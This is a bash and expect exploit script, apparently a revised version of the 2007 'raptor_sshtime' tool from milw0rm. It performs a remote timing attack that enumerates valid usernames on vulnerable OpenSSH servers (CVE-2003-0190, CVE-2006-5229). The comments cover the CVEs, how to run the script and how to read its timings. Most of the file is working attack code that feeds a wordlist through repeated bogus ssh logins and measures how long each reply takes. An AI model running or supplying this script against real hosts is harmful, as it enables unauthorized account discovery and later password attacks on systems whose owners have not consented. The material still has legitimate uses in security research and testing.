
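#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
# manually-set passwords that causes delays when processing /etc/shadow due to
# an increased number of rounds (CVE-2006-5229).
#
# This is a simple shell script based on expect meant to remotely analyze
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
# version and configuration, it may lead to disclosure of valid usernames.
#
# Usage example:
# [make sure the target hostkey has been approved before]
# ./sshtime 192.168.0.1 dict.txt
#
# Output: one line per wordlist entry, "user@host<TAB><TAB>real <seconds>".
# Compare the "real" figures across users; a consistent outlier is a
# candidate valid account. Repeat each candidate several times - network
# jitter is easily larger than the difference being measured.
#
# Changes from the original version of this script:
#  - wordlist entries used to be spliced into the expect program text, so a
#    username containing Tcl metacharacters ([ ] $ " ...) could break the
#    probe or run arbitrary Tcl/expect commands from a hostile wordlist;
#    they are now passed through the environment and never parsed by Tcl.
#  - ssh runs with StrictHostKeyChecking=yes: an unapproved host key makes
#    ssh fail at once (eof) instead of blocking forever on a "yes/no" prompt
#    that the expect loop never answers. Approve the key with a manual
#    "ssh <target>" beforehand, as the usage text says.
#  - the expect loop also ends on timeout, so an unresponsive target can no
#    longer stall the whole run.
#  - the wordlist is read one username per line (read -r), not word-split,
#    and usage/interpreter errors go to stderr with exit status 1.
#

# Some vars
port=22

# Command line
host=${1-}
dict=${2-}

# Expect program executed once per username. Everything it needs comes from
# the environment ($env(...)), so wordlist contents are never evaluated as
# Tcl code. The loop answers every password prompt with a bogus password
# until sshd closes the connection (eof); a timeout ends the probe as well.
expect_script='
set timeout 20
log_user 0
spawn -noecho ssh -p $env(SSHTIME_PORT) -o StrictHostKeyChecking=yes \
    $env(SSHTIME_HOST) -l $env(SSHTIME_USER)
for {} 1 {} {
    expect -nocase "password*" { send "dummy\r" } \
           eof { exit 0 } \
           timeout { exit 2 }
}
'

# Local functions

# Print the tool banner to stdout. (The original named this "head", which
# shadowed the coreutils head(1) utility for the rest of the script.)
banner() {
  echo ""
  echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
  echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
  echo ""
}

# Print a trailing blank line and exit successfully.
foot() {
  echo ""
  exit 0
}

# Print the banner and usage text to stderr, then exit with status 1.
usage() {
  {
    banner
    echo "[make sure the target hostkey has been approved before]"
    echo ""
    echo "usage : ./sshtime <target> <wordlist>"
    echo "example: ./sshtime 192.168.0.1 dict.txt"
    echo ""
  } >&2
  exit 1
}

# Report a missing expect interpreter to stderr and exit with status 1.
notfound() {
  {
    banner
    echo "error : expect interpreter not found!"
    echo ""
  } >&2
  exit 1
}

# Report an unreadable wordlist ($1) to stderr and exit with status 1.
badlist() {
  {
    banner
    echo "error : cannot read wordlist '$1'"
    echo ""
  } >&2
  exit 1
}

# Time one login attempt for username "$1" against $host:$port and print
# the wall-clock line ("real N.NN") reported by time -p. The username is
# handed to expect via the environment only. expect's stdin is detached so
# it cannot consume the wordlist being read by the caller's loop; its own
# output is discarded so only the timing line reaches stdout.
probe() {
  local user=$1
  (
    time -p SSHTIME_HOST="$host" SSHTIME_PORT="$port" SSHTIME_USER="$user" \
      "$expect" -c "$expect_script" </dev/null >/dev/null
  ) 2>&1 | grep '^real '
}

# Check if expect is there
expect=$(command -v expect 2>/dev/null) || notfound

# Input control
[[ -n "$host" && -n "$dict" ]] || usage
[[ -r "$dict" ]] || badlist "$dict"

# Perform the bruteforce attack
banner

# One username per line; blank lines are skipped (the original for-loop
# dropped them too). A missing trailing newline on the last line is handled.
while IFS= read -r user || [[ -n "$user" ]]; do
  [[ -z "$user" ]] && continue
  printf '%s@%s\t\t' "$user" "$host"
  probe "$user"
done < "$dict"

foot

# milw0rm.com [2007-02-13]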